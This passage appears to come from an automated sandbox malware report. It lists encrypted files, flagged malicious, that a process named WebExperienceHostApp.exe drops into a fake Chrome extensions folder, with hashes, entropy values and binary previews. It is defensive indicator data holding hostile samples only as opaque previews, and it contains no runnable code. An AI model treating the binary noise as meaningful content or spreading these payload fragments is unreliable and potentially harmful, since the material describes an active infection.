Preview:	@...s#.....).^F..h9..:..C>...+..GZ...........nh...(..8.....G.".. . ...z...Rq..}...Lj.E..p.....A.....e7..U.\|.\.n....I\|. ..$&.pw.....5..T....ck....@.(....'....8..}..Y......_FY....4....v..8q..rt.N.U..f...X!a.g/q6X.vt.,.".,.L.0.a.^[...]I..!.P.P..5...I..Bod....~...7..-..._v..X..+...}.......(.z.&.%,.....R..pj.+....'xS....K...F~.}..0.P..a...1..V..c..(C.......M...T..4..&.O.^.....#.rv..3.p.S......t..n]...K~^..j...1..~..S9.;.."....s#'.gl.....I.Y.)..j.1.3..#...O.l.t.....])k.ID7..0]...\|6\|.q.#n.&...V....jp....6..^..}'.K.)....2..S.Kop@..\2...E.OW.j...........!#...G\|{./...}../\|....7..i/..Y.5...u.uTe3..8tn.....G.&.F.u.y.w.O..@.W=.ZO0\|..X...1. ./ms...y.v..Mu..Ew....X...u.......T`.................c.^w+h`... P..............cw..?.I..!......g..].T...._m.if6$.D...{...L.06...Y.^."LUo...v...%%w.).+.0Q._@..WM`....1..&\...V..I/}&.C.:..Z.:.Q...X..d...\|....}.....a.>R.r]......O...]K.6.{.HV.Z...ix.....qw6..>.....2_.0..QJ.{..e..Jf\|.-..... .,a......B~..x..E.......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.118

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	36372
Entropy (8bit):	7.994711549739878
Encrypted:	true
SSDEEP:	768:K7uBZMznaY5ZGCDJ08STw5JNifGXnkhNCXi8Sc863ApF1SqMoxhCKW:IuBizaYfTJ08nfNEakT8SO3WHzW
MD5:	82F7C75D1D24AA85AA82075203F86CC2
SHA1:	ADEA7C7C9F7481108DFEFB9743916B8703D39965
SHA-256:	A6DD00F5B60E7A2772FE12C8A2439473C70744441B750A9486D8B1652945D0C8
SHA-512:	1CF1E0316D055CA51C03FA4FE39B3E454FA88B4BB48935AE9DBA59FF491789B1827DBF0FDC80EFB2DDB3D93237134F347CA7A9D498BF9E3AF0E6FD510FE6C1DE
Malicious:	true
Preview:	A........&o.#.Qm..}.J}..~=v..l.C...........{......}..Ku..B......9h.P...rI....^`............]...^.OFc.X`.-..G.......p9.n.......{_..rT....T&.....S/....`73)uk%.!.._i..\.......v...Q...^.I..@..9....;...;..lw....4x.b..{x8.\|`....{t.kh..'.bj.fu......z.SHU.h?Q.\|4Ol..cAV.........^P.\..G...rB.".=l...............\s..7Bx.w...Z./...m9/....y.@..y&mr.K...v.v.....m...5.w8$.....Dz...k.C...:...mp.v..d...`..C.._A.x..$8.Lv.G.5;......F.c..l.....z@.opE.../..J..M.Lk.u$=.O.9k..........{.....=...c.^.6<...;.8`....E.....9.....})K...l..$.z.\.BX{..`..qMY[..7.4...yM.b.......S}....Bm.\|..0.rX..g.v$a...$m......c?....l....=,..... 74..S..-S.0shF.l.....ClWp.6.1K.......%.h....h.=p..@.a.;...+XZ....6.L..,.`.k_.9.x.@.7...Ju...^].t.A..Z...w...'.j..Y(.3%n..'s....U.%..\.g....\|]..0'...Q.?Q[.H.)$.....pF.rO..:.u9{~J.]P$hr..i...(.._....@.....:.".^X.S;....-o...eE6..G....#....g.. ....'.....^.m..+.........%....."4....H~....1.....CS.Jy.g....\|.RH..p..f.2ck>...;.CW..d..M...'.F.\.`...p..R.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.119

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91528
Entropy (8bit):	7.997809403253262
Encrypted:	true
SSDEEP:	1536:TM2TyiKbNoW7T2wAblzMd868hzKqKw26vcf7eLMsyVOkWFkXlvDq+YQ:TxTy31T3Av68hzK974cjeCOknlb9YQ
MD5:	7895F5E9AA9FFEB607995F095530E06A
SHA1:	7CA6D5A406845675451F70182B31FC5B33689D2A
SHA-256:	6014F2516653259DD44429382CBC0171E594697792F0FD9AB495859167C83AF7
SHA-512:	F8F47EB24C1BFC00F8D2F91A4EA1052F343AE9804498428F8368F2F0BB851B3EB6E8C73D19A3ACF75E255803C21C9D413FF5CBBF74165A81E12F18835E6891EE
Malicious:	true
Preview:	..E.-.^#>.....C..../.J..)....l)..X.....r.~.."YQ.d.#."....>v..'u..E";.N..`.....`.k..Q..3..L.U.P2/,..l.Tm.1V,..$..C..s...z.....f.L.Gx.q.5...f.k......"...J.p........\..$..=.)+....J4.\|`.+6.............1....\|p.......}5...^..G.)...W.W..dZ...i.:M..fx..y4.7...@..R<:.m...q...[M.Z.z.q;.W..?.5....?.CS.<._..j.L.=]..ZF;..X.....)va.L<9eI....r..b5.S.gh..vh.s!..g...Z.>y&....v..pf.$.O.._z',L.E2@J}.6...;.z.C.r...z.e.K...@.....a..9My.....y...1....g.,.C...^..o.@.....T+..t+C.~w.i.......xw#.0....Y.....'.^.....~?.9^J.\._3n8q.wn..k..4..BYo.j.......E.u.k..$../k.@..L...........@...)FiIy........k..(h.Z.......H.1`.z.<.[..S.. ...`e..t...x...at._Q.e.%..k..Z.\|....C$Z<.-B.N.w/..a...i......S.kX..?.Z...&..@.W.5S.....2.G.yM..@.%K9.....OB.>2=..).-@..r...,...p!.>........M'...`..C.W.%.X.V.....+.yz...z....V5...Sk.......1D........5.=....3.(~".3..G2......X.m..+...iC0H.%C..p$..=..........\|a....B.j^.\}....2...:m.u.x....;...P$.}....f..0a...[.......k.g....N~3...+..:.x.v....../%(..W"....O..:+A.f

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.12

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	43413
Entropy (8bit):	7.995732888617455
Encrypted:	true
SSDEEP:	768:t1e+mn6GYHpdNPZYVcGKHqbwGah9eON3mfx+GqEZ9hsn9EUPo+:tQ+mnUwcGKTJh9Rwjm9EUA+
MD5:	825C6BC8D255C8ABCCDFFFE0AA79B82F
SHA1:	FE2134078B7D5A07EC1C4D0476E0AAA5C40D39D2
SHA-256:	247D839FADCFAD2D0275411407C4E4F49197122CD7DF6206D584896A06B84104
SHA-512:	E29C18B8CA02A67D55E70C2100CDACB495CE35F295BDEC73EF45137032528EBF8127D6214CBF3E039DBA43CCB58A0B0E3E2A283C74A7DEC9A7F128768E58E603
Malicious:	true
Preview:	.q34.O...\|/.....T.u..u.1...:..-.F.l.U.....+.F4..:R;..Z.@.?o.Z.......w..Q\.G)I...b..=..............U..Q..;"...=..........].9s......D.G.....k.m.uY]f.L4V.p.....=..p....J..J....6.....\|....Cy.....PSf...aM..dq._....J....u."V'.B....d.L.\|.k.xo.}..\|..$...2M..rB.....{s.,tBFgF...<.}.B.B....[.8.f....<0....q9.n....h2.\..&n.....{C.28.Q..(....&..~.c....p?..6..).)f."D8..}Ka..NZ.......nT..W.E..\|.so..\|p.L.M.b..,.w..F...}..u.Wd.4\...dD.s..@.....L....l...;...\|.]..i..{....i...-.....W.o.I.WX.Xl.@.....Q.*.1...D.+a%..._x/.]..B..l.?.tU.._.PTR....[.L.u\|...=_...0.."3:....f.L.9..g..v.....M.ZU...))..y..{...'~\.^$..}4.H..k.............7.C...AP;..X7V..(bu.M.:M.B..S....m...h...\.h...[...~....H..%.,c....H.....JX~/d[<.i...&....Q....j...:....8w...\|<l.a...b...?./%.P...C...0qv.i..!..d.1$v..w.6W..'...7.l.;.b.....A.9.oJ.&.k<H.I..>ro.....'.u....[3....N5.%.!......>...U..9..0..X...t....<..o@.$].s).......2..T...GUJR}.Oe.zF..O......%........r/g..e$P.\q`..S -C..C..?NS.e..ay..I!(...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.120

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34075
Entropy (8bit):	7.99419790942373
Encrypted:	true
SSDEEP:	768:Gsl2TD5b6dE9JS2tfrc9ViEvepTAf1IEMgH:GzTDQytfrc94EvemtH
MD5:	AC6719272D6956D378781BB6341E549E
SHA1:	F2EE51C53999DC6E608CCE7D7F94DFEC0BF01C34
SHA-256:	2FBE2C9FC3E8ECA9867D4640EACBF5F709FB957D64757979AC52D9EB4A478BD5
SHA-512:	1CF01E1325A6EF5633E0EE9320CDD7EB10B6E18D2726E62CC9DECAC53D4F6258243A2DF4005C01D4AB6EEE0872294CB2E9A791FEE3B93C80DE425EC8D7C741E9
Malicious:	true
Preview:	....\|<..'.\..."...!..\|..l!..t.......f.5.y....f.>...U.....z9o.6....I.......A)...~Y.M.....<p.7..i.Izs._.&)..c..V[...".TyRV.L....".KP...A.\|...#u.]....\|..}....}....M.H....Eg.&.<.....ou..-um.f)zA....T.b...W....Q[4l.&...1~.5.cB.kJ.ez._<.2o..x........h.H.~...>D.j.G.:.e......z...,.P..../.).;.K...R. >..'Z.^f......+#4. .w..;...`.....)k.....K.........qy.et?v..._...tce.....i.K...N.....55..~..Z..R.O...e"2..g..u%.....9.........w..4S....IZ...[@x...d"........f......}.I..........G..h..$j>wY.\Z..dv.\|...F..OQ...Oe...; .DFn....E......V...y.&.YgpL.IV.5.)X%....u..v:.F.8M.......e.......)?.4..{..UV..X...M......Y..;..O.._^X.j..7..a\|.#..e.......7...oDh.5R...YD.)..nr.q.........'...f....}9$.].6.Z.'..P..h\.xgwo%>.>..].]S.'.4}r...H..=...V.".^[.Ng.u.W...4v..%p.2......*.w2b84.....?.....4..1..r..h/.JE.m.....?{:..I..d...[..t].o..^..dH.... @.3_..6.zg...c4..E..:....)...7..BS7.R.Q.F[..Y......g.....I.....#....W...<..Xe...G0..r.".:0..D.d?.D#T.:..[..p/.....X.nL..`.#.%.1.<fDB

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.121

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	82658
Entropy (8bit):	7.998200093294084
Encrypted:	true
SSDEEP:	1536:YdvxckIg4UNK5/ZWLNQMDivHEStvroUqFvuBvBLyFqdVLln7h6Jf65Z2a/mUfMGd:Cva7fyUZxgStvroJQpAFMpn74JfqAa//
MD5:	A23BE06811102A6A68C6F04ED143C8A2
SHA1:	D58CE4DB2F79B5ADA2203F00DB23ADEECE381AFB
SHA-256:	8D6BEFF91A3715E9D8CFAA38F2EDEDF08131D4D3E4DE190DD203749C32FE29D9
SHA-512:	D2DBD9C64DA5B87C791DCE94FB92D2FA86DE2A12B009F5A36AF8B4FF395ED45C54D68C8BF4961E6ABC13BE1E562E630A7B012606391824A01555B43657EED9F4
Malicious:	true
Preview:	...DW...}...[.8{"BN..6.-.:H.>.D#[.p~...D.C..s.Ms.....+/...O.....+..1 .#.. b].yK.]#p..9..I..E.....1^e.1..E..5Kw....$.....M........f./..B.]h....u.o.U...-.9.ne.L........;L.^.H.3L..d<.B......8!P.C....M.,C~B...2..$Hf.K.b...~.xI..`...V_..K...k..w(H3..@...dc....[P.k....L...}9..NR6...I..'t_{....=..Gr...S0i...F...^8o...Rv.5.N.R.G...=....=\-x.......I.l.,.$.Fp.c..Hi...r.0o.........o!.BKs`vj...G`...Q..`...b#..f.....WTJ.P.<}9`....t..._.T@x....._yp@ 9.+...b.P...-iZ...,1.t.......-u.6J@ltpE...7..p.,a.....0cF1^...E....... .Z..E.......7.....R.4N..J..uU.!..I&.....z0h.O.rx#y.q..>..>.k.M.#........{T.G2..s.......L...._.Z^&.."..\.0?...Db+...Vx5....&<...(...d.N<..Cs...g.(.I..[.t.e...n......l.,.......j.....j+z.s.......8\|`.sy.zO.."R.q.\|.X`..../1.j..=......F,.x..Z.=F.y.T.7&...y.m.T..bE.U...@..VE..t.B....?....G.....{w..D'I..pUAwM..JC.....;7")s.....C[Q.M..j..7.v.J..7k>...rJ..&.q?..; .....4M\..}..b...HUu^&oH.\.2.p..1d<.I.>.G`I....,.....%<!.r.J...7...*..u.\|UK....a..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.122

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	25552
Entropy (8bit):	7.9935670475036895
Encrypted:	true
SSDEEP:	384:yJ/J8EY3KC1Wv2T3gzNpv6aVCHgT+k6h1ci9k7HAKU8Rt2K9Qnm/yf:qU3Kdv83gzNMpnhqsMr9Qnm/K
MD5:	B118DE4C565F9D26A5DFD05780C81E80
SHA1:	D338CE01C4C9A8B15333697A408BF3E8982378F2
SHA-256:	66CF1243D1DC57C256AC69A80341E13B00672F5A3DEDA12592A68E1A6C1D24F3
SHA-512:	E5E8D8CBDAD4846D1B3A594750410FC9EA6429A8D209A067FC80A9082086D82327C8C0BF86D02520CEAAA13CA596B020C77340EB25E59310C88F39B666413A7B
Malicious:	true
Preview:	..y.... 6c.v...z>.S.&.....Eku....pL...>.Rw..[..5`.jP..5......Pl......u.l..&Y]...T...0.y.Q.J.`0A..A....p.Z.[!rRs.C.@3'2`'h~.K"{......b;..}..\|<.2.....i%....... a...R/...Y8YI-...oQ$.l\.0........Q..I..40..$p...F....Du1..f..S-..........>...>2...J ..]...zrm...&K."~..0<.V.n:R.P....,\....-...3......./.T!Y...(...K.._.........1E.,i... ...J.w..]^.<?.#...'L./B.\|w1..;./a.8.....M...:Qy1d0s.~<..c.Ym..R........J......x....B...e......P.W.6...p&k"s...^...E~;rlG6.pu"..!..j...(S.O..]r.MW.......$blc...(2g.`..].Bm..c6O.........[.(;....r.....Of.......7]u..C.=.D.Cx....J.g..$..T........XM....4.4.z...w..B.2E.Y.Z.\.Qw..=...`.8j.b.O.h.J.a.....Y<...E.?.7.w..~0...\.+PY....4....,....1Z:..-.U......Q..........c$wn.w4l.e~..S6I1.].I.G~..f....cf-I..b....4..^.u...V.A....A.Qi)......!...ZU..+..YJ...1T..Iam..8EC..8.GD....N.F*<F......?..7...8..m..`'.1...r..G...J9.Q.6......=.Z..$`o.yV.........7.g.{3/w...dE.+.M]......h}.....v.).^M...-Pi&U."%...cx.>.0..S.7..$/C.....L1q.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.123

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	159374
Entropy (8bit):	7.998773738175384
Encrypted:	true
SSDEEP:	3072:X01tCIH8orGX/LUcN6vxDinsDZ+WBzJWkHLtmbx1eH03:X01EuGvYtv1P+WBVWkHLtm11D3
MD5:	3C6307C476A3683387EE6DB0DDAD1E0E
SHA1:	8CC3F346552397F3D91411055E3F299687AA81E4
SHA-256:	3DD1BFA0118F4C06861FE5EBE3D24C95B9B8DDE2A81F814E15D4B5FE3F6406D6
SHA-512:	0D342EFC0D1594A820AD8F92C0E8A339A8FE32E675EA96ACEAC2A0B78953A0F447E40D8C4EDECEAF799E5E6B9631ECA2ECE27653110CE6402D66C56953A6B26C
Malicious:	true
Preview:	..k...p....WO.e..dK.....j...=.l5..`...k`.#.^.O....7..o 0.K..H.WAo..+..k.T.....!.G@m...:...A........^.dy..6...p...t..yt.f.)......nw...!g.E2).ku..e....._......$S.........Oz..]..2.b. '..\|Xy1..&L....i3b...,m../..)0.%..U.6.MJ...S..........b..^SL...E....R:Mk.5e.6.r..I.m.....y.[^....1.......u22...D0...^.b?.H.>UE...g.......h..O}..Jp.....n5.>C.UN.&e....Y&)_.).-._....KN .'..C..4......`2.".D...O..vV....A{...M.]?.w....R..4...+....X...p.\|......+.81...B..?........H.H.D@S..... .}B.4.o.d.g...`p0.u. .....BZ92n%..W....#....`.......l.......k..{.i!..G...Z.n..\...=$.('...w(\..hgQ..%.a.=W.m....M...$.. \.8.Y...D....b%#8x..I...cDED=h.........P...C.}...8.V....S.T.'A..EG.e...\|OJ..N.....R!.`..&.....}..Cm"...m....-...+c.h.@..jz.....OY....s{..j...ZTmM..cK.U@w..._.)..eC.....Ex1..5,..+..y.J...qY.(....=.....v.I...2I...fmCT.....p.<...~....s^.qd.wG.U.O....5.....a%.A.)....3......Q.......y..~Q.D5e.y...{Z&.. ....>...p5T..UV.?.>F.....o.[p...f............A..m.{%.s'm]C3

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.124

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	83177
Entropy (8bit):	7.997820367544763
Encrypted:	true
SSDEEP:	1536:Wa4N/yNuAxxMHliuIZ8Uoe6Vge7kaPL7JUGQ5cXOpgX2pr+43T:P4Fy9WdICNb7TXJUGQ5Qylpr+C
MD5:	931F81F2E32F5C2F7F7A68E7F23724B3
SHA1:	78BA60F09DB46BB22A03845B85E7575E773755EF
SHA-256:	175DFE67454227081AB166CF338CFB3854561F648BC4B9444CDF67D027EFAA72
SHA-512:	A87DF23ED28ECC5F43D6C3B4E589F4705002AF58C43813D32A2A1AA5FEA5038444C4E0458914BBDEBB78606D1B17B4B94A8068D62A01214C8EDD058860889FD5
Malicious:	true
Preview:	\.+..Z.z@I....ix..B..-.,...1;.......X.:I4.Z..R(..l....O..$K1.x...H.A.o..o...t-Q....V$.c..6o.s..a0..5.d.:P5.?........\..R.^..0.\.&+.bz.K ..z..P......P....o.G.;;..e......5..p$.=./.sz.. =....i..V);6...".....\.)];.'U.+ O..&=...=s...?....dbB.........[.._.....>.$p.....YC..I....@.E...(j.}.eo..).(.R.+'p..g..)+rs/...%........W..5...$.Z..t3..]W.....R..i...%.>.._....e.f+..h..T.....8..z.GvW.<..>%..2..^.....?XV.....S.un.K.}1<..ZQ...)o6.....e.F....+.....)..>.xMC.$q.TN.\|......}lX9t....V.>.N..,.C.(j>4....Wa.......O4.h!P.....V..k1.B..O....$2..........lV_.I.d....N..)...1.z...vm..e.)c......,..z.....5.......2.k.fQ}..d..%b.>.co}.rr.<.P ..PN...R.....)..nJ..A......Z.R\|.1.........E.d.a.J..i{...[N..g2g9.d.7`D..}.m.6...'..\.\.......mG.....p.9..o......FKF..T....w.M...#..T.\..n.PH.(....Y..%.9....$L~u...........XG_..~....O..H.%....6..:.'>f....:.X.M.Z)...\.F..ZCf.O..X...[.u.e.......]...{.\..6...f/.....XQ.G.N.a4...G..c..F.'...6I8.B... Hc.-.[.Xz.+(P.Q..h....[7.x].*.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.125

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91144
Entropy (8bit):	7.997903537205584
Encrypted:	true
SSDEEP:	1536:uydEy2hCtdX7GLIdhZJx7t94YPjGDWlCMgzOUF8DCBQRVUNi4DAIlVCIOw1AVeFJ:ucDJAED7sq2nzJF6CyDU84DPy5w1AVeX
MD5:	248001727FB11F5C6B50AFBD2C4DCAD8
SHA1:	03BDD5C3B1951E957AC40CAB7126D7F844823209
SHA-256:	B6424483E87036C08D69758E3FC133A63765605E949E49EE7AD3ABAA7F57C6C8
SHA-512:	504C13286D588F74B27B023C7967F62025D747AA70A1349DDB48A57FD54E448E059CB0CB77542D1417199F5D0C7FC6ADE4BE998E7029FACEE31DA3A3D33D2F18
Malicious:	true
Preview:	.6..PJ...i..("..4.'4X..1............M....!.T......i...<h.\|...W....Z.R.....4.\|,~0...Un.n.%6.u.(..U`N%.<.;i...+z.....5.\|.....d.#.s:.$g.iAy.y...&.@7.wEp.....7'.~8.....+.^....9....l.")..AQB....Q..X^.L.H4.N.#dI....6..8.MF....ZW\.~8...i.l-.\".7P[.0.Q.u...B...&.\|.`.0.L.S..6....Vy.CT....){....+...?PK3..C.[.....p...`...U...-L.t.....oP.ghT.../..p.Sn2p...0u.o...:^..?.huWu..&....@3z3S..]o.,.Q.Iu.?bM=.<.......}..<.:v.2v..5.~.+.2....2._t...O.v$..:*:.[.."....Lh1..+b...Y}N DJ..s...,..3(1.....U.w."H.I9.j...Y...L...3As~S...R.vY......i..tKv...\jO...-..7.G.....j]."5...T..2.P:......./..q/.1.H.(_.e\|;..WE&%....B.N....@...Y.h....%r...%...%..Q..{...Q.>+E.x._.3...k..9.......e..@qgb9.k1..$....1..5=...;......&.=.=.Y{_..i..gFA...V.....h.}z...M.)..5...7\~l..K.^...H[A}..........=.....pHW.....%.jeMWdyO...e[..)}....o..3.<.b...0..v........?.......f.N.c.].K..?.Z5V.oQj."t.0.....q.,.._.....9y...iBuM>k..Q.4......m.`........]4..P.5.xU......P..W._....vp.......thg...I.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.126

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	85182
Entropy (8bit):	7.997953961827474
Encrypted:	true
SSDEEP:	1536:TpWbu8hSfroOuGhuI7QT2U3bmYRzmiDhY1wSLwZg3rXs9vPucmy99b/TiHe3YdRm:JjzoFGhu0W2EBjBULYvtmy7iHe3cbk
MD5:	C42541122EA3F92912C2C9F6B66436C7
SHA1:	7CB18EC967B1A7EF3419D88D904B3784522D5437
SHA-256:	C57FAA6E91193CDA62623DF55E4903BDFDA46CD48E3C1E6F3947A74B8A15048C
SHA-512:	81E3BF61BD468DCF5AF9AAB12B6DC2F4E5E8F4782B76D0996137A90C3B4A0768F6E09BB9B40AFB99DED9AE4D7B29F42AAC4C4FD53F57158FC537A64FC5865943
Malicious:	true
Preview:	.a.#..pl..>.M".]QBl..]F...........J;.89=..UZ1..X{.2.u...Bo..Ur..E.....4..f.......RG....B..5X.n.z..(..D...W.8h._.`\.r....'%C.7.>`r?....'.'.S.....2V.....VYMf{B....k54jh.......;..E.....Y.[.v.a~.~.45...p?........sWg).T.A.E0.g.B$..!.l.Or.......C'8..!.<...?..L....:P.t.....[S.>.L.M)...YAl}....'.R..E......h?.....ig5..K.&.K>.S\#./'z.9.).N.....^..y.@.w.."4?8oh7e...c...&\..(.6..E.3%Ss.Q$..H..;.7. .j..B..M...)L.!..6..b3,w..GZ.y.Il..xb.#...l+...J...5.I..ww.Y.&__...(..P.....~.. ....W.o.....X..e.u.%+..=...M........zD..z".r.......?O.]..8A.=TV'.....0...+@@..#r../Q..O.\|._s...)..F..7:.r..&.f....f...9.n@S..i.4..{..w.H"9.{.j....A......q...<{nk..5..u.......v.........~...-..r..u...F.Y..(.C..n..Q#.}..O\X>.7l.Js..(...R.#b..\u&..L..R..E<.W..n...V.W.:k.,]R...x.....J..........x..3.r..(.......&.d...O.'.v..q.r_...5..C....[..5R..p......\.........T....#....a..F..q.. D....A.9.......P$H..<.5..).A...m...(..Ka.z....wZ;.?.x.......V[.7}*.)..#....9....SZ........=.....[To....\.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.127

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100405
Entropy (8bit):	7.998190619536125
Encrypted:	true
SSDEEP:	3072:Q+WeOazbszKIwkxCydCTNNDQz1XwoH4k+xgwA3:1TbzbszKx5yQpNDwwN9A3
MD5:	2E8EFE34A781ABF1A05EB075197B5791
SHA1:	23999005B9DC0575591847A8F3C56CFFA45205FB
SHA-256:	1C821B066531B7AC9397EAFB60728FA7A4998611B0344AAE0F384C10552982FE
SHA-512:	2E930B202094D95AAF9835ECE7D9A415AE747B01E87F078C5799F57C3F557FD246118BEE6A05DD1CCFA0D62E67AB47B382766F732E95611183488A4F9AB021D6
Malicious:	true
Preview:	.SI.....@.%D.P...F`.....s.N..F.~.y.V.}x7w.Y.a.BT...C.C..KHPh..s.y..#m.U.HpI.H....\|H..I.........;.$:...f...lx...q..jh...=]....;@......Ay.....(M\|.&..d.8p.PH..h..........n...y........]..SZ..+.u.9Z....h.#...-...r.yX.S'X.$..NK.4.@.B..8,..}4.....FSF%..Lf9,RWub......Gk_...P'.zo....y(._......DU......z8..L....W...U`./.C....~.).@........9M?^l.b.h....-.58...H..#..D...c>.v...............j.K.EcE...\|apNG........~]......+.5.0s2T.g.V]....!.n...Yir5.to..O#<Z.N.X..[qC.@[....`Y.6.Y%W..vX..........`.h...F95.[.vE.^..pVN.84..6....X.7h.w...4,=.$.e.&.F.^>[..M..UYd...P..2\..0.U.p...&...X....'...U..z....+W.xA..N8WLv...F.....bk.&"_e...".H.y.....u..$cj.$...iK..9..E..V2..rR..um...V.."l..Mc^..m.1.....[......^.+U.7..?z....+..}.7........@....Bs.......n.....+...?.......qSWx.......[.F.=..v...o.4.^(6..}.W....c.:.Dk.`.7...y.R.;.{..._.......k...Gl.o.fj..uI..[...S.....L.%............#Q.Ii},...(.?)X.r#.W.......S..\|MT.....g..vV....@..%..u..7S/.".K..d...G..4......-.*...,.aL..\|k

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.128

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	43583
Entropy (8bit):	7.995787073284486
Encrypted:	true
SSDEEP:	768:dO7hXlh8QsjFbzita7Or2u4/7Hv0bUPIv7YAh7R6MDKdavoHTedvXOeuiz6J7:dO7hqFbzs2uK7Hv0QAv7YmAGeaAzedxk
MD5:	BEC41F95F6524AC749D806AFA5DF4A00
SHA1:	87B4599511670F18EEF7021A84F3A39F74BC6A30
SHA-256:	95BBA1729C2856D38DE67007C0400D029CEB2952A14C03CB48C86ECBF1838824
SHA-512:	C59D1D06C0A7404C9035977CE607E8672532A17D1FFB7EC125653E4D89E38DE26C448A28B5EAFB3DF2D4F9E71A7D55EB34290DB3A2A20AC617422E4D3CD6558A
Malicious:	true
Preview:	$..k.L....f.C.......V.ir..W........Wb..P.......zq../..S..e..Jk.....q..]..@m.:Wf..."\|....s.....)P.S...G.....7.;.N.a".`...CT..K...c...~..b..7B......62...X....[&..".....Pc.7(.W+.V..S.,L.\|;........U...h.....Et.c.U9..`....f.J.-..E..a..iGH,.....6Q<......}(..))]..\|z../..#.T.?....z\.{.."..`.[...\|..z.....3......`....s..X2...a5..Ai\|.h.xiC.D..8.0....`r._ei.2j..M...3b...g...}b_7.........a~..B.VO.}.AK"!.1..ca.Q.8...S...=[.9.W.#....C.V..../...v..h.k)....#.;...D.1.5........\..k....j...^.....@.E..2...4.tbpN ...f...x.......5...@.I?.&\|2..H/..0Ek.5c.&..>.Rj......;.V#..b.g....\|&....t/.X..\|.2..,."V^.l#...."5.....V...2.@.....h.8.8..;.J.I-.@.0.p?'.S..C`.b....I...v....Z)GK....Cm..j\|i.;.;p...W}`+\l...b.."..P..W...6..1...f?...}J.k.&..O..w..`..R^..'F!...`.J..)... .....v,.w\|d.i...C-...{Y.+.,....I......Ia...MI.`..b.7S...2.......0...i.]...C4{.r...`...$u.}QM#...M..rAg...\0B....We.\......).S.Z.>.}..<.....\..lD....I..i....%T....[S>c.A..].q.g)...Q*L........

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.129

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90675
Entropy (8bit):	7.997679201177581
Encrypted:	true
SSDEEP:	1536:ziWmgTomDoBlH4giuP+d2oTW/SmsEnEcsn/yIvYPzUrsV0Gh3803kAEYIRyzixom:mMTve4gH2dVzXEnEj/yIg7Rx3803Dckw
MD5:	7A2C2F21A9735BA8D79CDFD2E2B11A05
SHA1:	B8E44B13551AE586CE2427EDD0ACBD6C065CE306
SHA-256:	4943B9DA5488B5F3E389F9A8E566537A4639763C8928A5D66E712D45ED9BC554
SHA-512:	3AA844969BAF33304886B3619000AADC82DF73A07B84559383B2A21C458DCBEADBB5DF0A7C6FE74C01A3C8882C3A99E81C23777498971690C9A89DCC303B8B32
Malicious:	true
Preview:	U/. ..P.....A.SO..%.A....\|CYf.D.O.>.aY.{./#..{..J...e.d....D..J=H.7..%. z}...dB......W.z.t..5i..T...@6.L....3..[.H.q........}...Y....u../..8n.....A.!../...&.S..&.%>+SHrcy.....]M..6.M..X.I.n....(X.\|a.. ....%....!g..\|.m.?U........KU... ....q...6.g...K.a.X..)...."...-.{S....... Z;..m.Tq.\.A.....E.R..d..b..Nl......YXM.6.'v.h.Wf\|..F.....>.....k.Z.....([pk6..70!11x..<."$^k7..G.s....&..y(..._..d......`.L.p.R;.[...2.+PL......=f...C.u...........G.)Oe...,...E.o.a,..B..M..i..3."........h.i...Kz.J%..'&..p..$4.....~..]<5....[.Q...L....5.u...K.....M&./\eG9F.s...,I..sg...d.~.&.....Qw.pv~.Q?.......KD.G........&..._^...,.88.w...t.Wf.7..w..............;/x.#t.T..Y....m){.....r+...y.XBh.:..\|.........XF.z.:`....K..<d.a.j."..-...UT...cyI).@...bY.+.c...q.K.@...P.....A..M...-......+cx.....c!.xE.....ls..n..P`.J..#.y.5dwu....q.ix......F.Qk..X.....I~.....U..s.....+....`..m....j..Z.!......VpsDl....eM1f.sU`]5.q.r..])..9.o...o......2..*.:..0.(.T...D....\|.aeg.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.13

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	PGP Secret Sub-key -
Category:	dropped
Size (bytes):	36824
Entropy (8bit):	7.995550572572611
Encrypted:	true
SSDEEP:	768:+8rr/EDdU0yKCPEO6eGSnllQhb5Ot6v+mWNtyKIHj:+8XsDMKi6KEh1O+D
